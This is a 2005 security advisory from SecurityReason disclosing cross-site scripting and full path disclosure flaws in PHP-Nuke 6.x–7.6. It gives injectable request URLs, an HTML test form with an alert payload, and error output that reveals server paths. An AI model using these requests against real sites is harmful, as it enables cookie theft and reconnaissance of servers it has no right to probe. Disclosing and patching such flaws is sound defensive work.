<<< Date Index >>>     <<< Thread Index >>>

Full path disclosure and XSS in PHPNuke




-=[ SecurityReason-2005-SRA#04 ]=-

-=[ Full path disclosure and XSS in PHPNuke ]=-

Author: sp3x
Date: 3. April 2005

In Memory of John Poul II :
===========================

"Love converts hearts and gives peace," - John Poul II [The Great]
"To mi&#322;o&#347;&#263; nawraca serca i daruje pokój ludzko&#347;ci, która 
wydaje si&#281; czasem zagubiona i 

zdominowana przez si&#322;&#281; z&#322;a, egoizmu i strachu" - Jan Pawe&#322; 
II [WIELKI]

Affected software :
===================
PHP-Nuke version : 6.x - 7.6

Description :
=============
PHP-Nuke is a Web Portal System, storytelling software, News system, online 
community or 

whatever you want to call it. The goal of PHP-Nuke is to have an automated web 
site to 

distribute news and articles with users system. Each user can submit comments 
to discuss the 

articles, just similar to Slashdot and many others. Main features include: web 
based admin, 

surveys, top page, access stats page with counter, user customizable box, 
themes manager for 

registered users, friendly administration GUI with graphic topic manager, 
option to edit or 

delete stories, option to delete comments, moderation system, Referers page to 
know who link 

us, sections manager, customizable HTML blocks, user and authors edit, an 
integrated Banners 

Ads system, search engine, backend/headlines generation (RSS/RDF format), and 
many, many more 

friendly functions. PHP-Nuke is written 100% in PHP and requires Apache Web 
server, PHP and a 

SQL (MySQL, mSQL, PostgreSQL, ODBC, ODBC_Adabas, Sybase or Interbase). Support 
for 25 

languages, Yahoo like search engine, Comments option in Polls, lot of themes, 
Ephemerids 

manager, File Manager, Headlines, download manager, faq manager, advanced 
blocks systems, 

reviews system, newsletter, categorized articles, multilanguage content 
management, phpBB 

Forums included and a lot more.

Vulnerabilities :
*****************

Cross-site scripting - XSS :
============================

In PHPNuke there are XSS that can  be used to steal cookies and do other 
operations, which in
normal conditions are not permitted by browser's cross-domain security 
restrictions. 

Example :
=========  

http://[target]/[nuke_dir]/modules.php?name=Search&author=[author]&topic=0&min=999999999[XSS]&q

uery=[our query]
http://[target]/[nuke_dir]/modules.php?name=Search&author=[author]&topic=0&min=999999999[XSS]&q

uery=[our_query]&type=users&category=2
http://[target]/[nuke_dir]/modules.php?name=Search&author=[author]&topic=0&min=999999999[XSS]&q

uery=[our_query]&type=comments&category=2
http://[target]/[nuke_dir]/modules.php?name=Search&author=[author]&topic=0&min=999999999[XSS]&q

uery=[our_query]&type=stories&category=2
http://[target]/[nuke_dir]/modules.php?name=Search&author=[author]&topic=0&min=999999999[XSS]&q

uery=[our_query]&type=reviews&category=2
http://[target]/[nuke_dir]/modules.php?name=FAQ&myfaq=yes&id_cat=1&categories=45435[XSS]
http://[target]/[nuke_dir]/banners.php?op=EmailStats&login=[our_login]&cid=1&bid=[XSS]
http://[target]/[nuke_dir]/modules.php?name=Encyclopedia&file=index&op=terms&eid=1&ltr=[XSS]

To test XSS for example in 

http://[target]/[nuke_dir]/modules.php?name=Encyclopedia&file=index&op=terms&eid=1&ltr=[XSS]
 we 

can
create a form. 

test.html :
-----------
<form name="mantra" method="POST" 
action="http://[target]/[nuke_dir]/modules.php";>
<p>XSS: 
<input type="text" name="newdownloadshowdays" value="7">
<br>
<input type="hidden" name="name" value="Downloads">
<br>
<input type="hidden" name="d_op" value="NewDownloads">
</p>
<p>
<input type="submit" name="Submit" value="Go!">
<br>
</p>
</form>
-----------------
And enter to inputfield "XSS" this :<body onload="alert('XSS')";> and click 
"Go!" :)
Or just replace [XSS] with <h1>w33t</h1> in GET method

Full Path Disclosure :
======================

Full path to script must be kept in secret because it can  lead to successful 
attack on the
website. If the attacker know Full path to script , he can start searching some 
more info on 

others folders or about the server where the site is and  then try to break in.

Many scripts can be accessed directly and this will provoke standard
php error messages, which leads to full path disclosure. 

Examples :
----------

http://[target]/[nuke_dir]/modules.php?name=Your_Account&op=userinfo

Error message :
---------------
=====================================
Fatal error: Call to undefined function: nav() in 

/[info]/public_html/phpnuke/modules/Your_Account/index.php on line 221

======================================

http://[target]/[nuke_dir]/modules.php?name=Your_Account&op=my_headlines

Error message :
---------------
=====================================
Warning: fsockopen(): php_network_getaddresses: getaddrinfo failed: Name or 
service not known 

in /[info]/public_html/phpnuke/modules/Your_Account/index.php on line 1548

Warning: fsockopen(): unable to connect to :80 in 

/[info]/public_html/phpnuke/modules/Your_Account/index.php on line 1548
=====================================

http://[target]/[nuke_dir]/modules.php?name=Encyclopedia&file=index&op=search

=======================================
Fatal error: Call to undefined function: search() in 

/[info]/www/phpnuke/html/modules/Encyclopedia/index.php on line 267
======================================

How to fix :
============

Download the new version of the script or update.
Because phpnuke don't have security contact, you can download fix from 
www.securityreason.com/patch/SecurityReason-Fix[1].rar
Also on www.nukefixes.com the fix will be avaible soon 

Contact :
=========

sp3x[at]securityreason[dot].com
www.securityreason.com